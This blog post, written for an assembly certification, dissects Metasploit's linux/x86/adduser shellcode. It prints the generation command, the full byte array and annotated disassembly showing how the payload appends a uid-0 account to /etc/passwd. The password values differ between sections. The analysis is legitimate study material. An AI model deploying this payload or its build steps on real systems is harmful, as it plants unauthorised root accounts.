sábado, 10 de mayo de 2014

[SLAE] V-2 Analyzing Metasploit linux/x86/adduser payload

Source: SecurityTube


I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.

1) We need generate our payload for post analysis
msfpayload linux/x86/adduser USER=doomedraven PASS=rulez C
/*
 * linux/x86/adduser - 98 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, USER=doomedraven, PASS=rulez, 
 * SHELL=/bin/sh
 */
unsigned char payload[] =\
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x29\x00\x00\x00\x64\x6f"
"\x6f\x6d\x65\x64\x72\x61\x76\x65\x6e\x3a\x41\x7a\x56\x73\x58"
"\x48\x68\x50\x44\x73\x74\x56\x51\x3a\x30\x3a\x30\x3a\x3a\x2f"
"\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04"
"\x58\xcd\x80\x6a\x01\x58\xcd\x80";

compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode
source of .C code can be found here

2) Analyzing with GDB

gdb -q ./shellcode

(gdb) disassemble 
Dump of assembler code for function payload:
=> 0x0804a040 <+0>:        xor    ecx,ecx; 0
   0x0804a042 <+2>:        mov    ebx,ecx; 0
   0x0804a044 <+4>:        push   0x46   ; 70 = __NR_setreuid -> man setreuid
   0x0804a046 <+6>:        pop    eax    ; get 70 
   0x0804a047 <+7>:        int    0x80   ; syscall return -1 = error
   0x0804a049 <+9>:        push   0x5    ; 5
   0x0804a04b <+11>:       pop    eax    ; eax = 0x5 = __NR_open -> man 2 setreuid
   0x0804a04c <+12>:       xor    ecx,ecx; exc = 0
   0x0804a04e <+14>:       push   ecx    ; 0
   0x0804a04f <+15>:       push   0x64777373 ; dwss
   0x0804a054 <+20>:       push   0x61702f2f ; ap// <- 2 / becouse is not importand here and we need 4 byte
   0x0804a059 <+25>:       push   0x6374652f ; cte/ <- start of /etc/passwd
   0x0804a05e <+30>:       mov    ebx,esp    ; save pointer to /etc/passwd
   0x0804a060 <+32>:       inc    ecx        ; 1 == O_WRONLY <- /usr/include/asm-generic/fcntl.h
   0x0804a061 <+33>:       mov    ch,0x4     ; 0x401 == 1025 = xor 02000,01 == O_APPEND <- /usr/include/asm-generic/fcntl.h
   0x0804a063 <+35>:       int    0x80       ; syscall return -13
   0x0804a065 <+37>:       xchg   ebx,eax    ; save syscall response into ebx
   0x0804a066 <+38>:       call   0x804a094 
   0x0804a06b <+43>:       outs   dx,DWORD PTR fs:[esi]
   0x0804a06d <+45>:       outs   dx,DWORD PTR ds:[esi]
   0x0804a06e <+46>:       ins    DWORD PTR es:[edi],dx
   0x0804a06f <+47>:       gs
   0x0804a070 <+48>:       fs
   0x0804a071 <+49>:       jb     0x804a0d4
   0x0804a073 <+51>:       jbe    0x804a0da
   0x0804a075 <+53>:       outs   dx,BYTE PTR ds:[esi]
   0x0804a076 <+54>:       cmp    al,BYTE PTR [ecx+0x7a]
   0x0804a079 <+57>:       push   esi
   0x0804a07a <+58>:       jae    0x804a0d4
   0x0804a07c <+60>:       dec    eax
   0x0804a07d <+61>:       push   0x74734450
   0x0804a082 <+66>:       push   esi
   0x0804a083 <+67>:       push   ecx
   0x0804a084 <+68>:       cmp    dh,BYTE PTR [eax]
   0x0804a086 <+70>:       cmp    dh,BYTE PTR [eax]
   0x0804a088 <+72>:       cmp    bh,BYTE PTR [edx]
   0x0804a08a <+74>:       das    
   0x0804a08b <+75>:       cmp    ch,BYTE PTR [edi]
   0x0804a08d <+77>:       bound  ebp,QWORD PTR [ecx+0x6e]
   0x0804a090 <+80>:       das    
   0x0804a091 <+81>:       jae    0x804a0fb
   0x0804a093 <+83>:       or     bl,BYTE PTR [ecx-0x75]
   0x0804a096 <+86>:       push   ecx
   0x0804a097 <+87>:       cld    
   0x0804a098 <+88>:       push   0x4 
   0x0804a09a <+90>:       pop    eax  ; 4  == __NR_write == write(int fd, const void *buf, size_t count);
   0x0804a09b <+91>:       int    0x80 ; syscall 
   0x0804a09d <+93>:       push   0x1   
   0x0804a09f <+95>:       pop    eax  ; 1 exit
   0x0804a0a0 <+96>:       int    0x80 ; syscall
   0x0804a0a2 <+98>:       add    BYTE PTR [eax],al
End of assembler dump.

3) Looking with Ndisasm

User:doomedraven
Passwd: import crypt; crypt.crypt('rules', 'Az');'Azble21jpm/n6'

msfpayload -p linux/x86/adduser user=doomedraven pass=rules R | ndisasm -
->removed 
00000029  0000              add [bx+si],al;0
0000002B  646F              fs outsw      ;do <- start username
0000002D  6F                outsw         ;o
0000002E  6D                insw          ;m
0000002F  65647261          fs jc 0x94    ;edra
00000033  7665              jna 0x9a      ;ve
00000035  6E                outsb         ;n
00000036  3A417A            cmp al,[bx+di+0x7a];:Az  <- start passwd
00000039  626C65            bound bp,[si+0x65] ;ble
0000003C  3231              xor dh,[bx+di]     ;21
0000003E  6A70              push byte +0x70    ;jp
00000040  6D                insw               ;m
00000041  2F                das                ;/
00000042  6E                outsb              ;n
00000043  363A30            cmp dh,[ss:bx+si]  ;6:0 <- passwd end and id
00000046  3A30              cmp dh,[bx+si]     ;:0
00000048  3A3A              cmp bh,[bp+si]     ;::
0000004A  2F                das                ;/
0000004B  3A2F              cmp ch,[bx]        ;:/
0000004D  62696E            bound bp,[bx+di+0x6e];bin
00000050  2F                das                  ;/
00000051  7368              jnc 0xbb             ;sh
00000053  0A598B            or bl,[bx+di-0x75]   ;
->removed

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


No hay comentarios:

Publicar un comentario en la entrada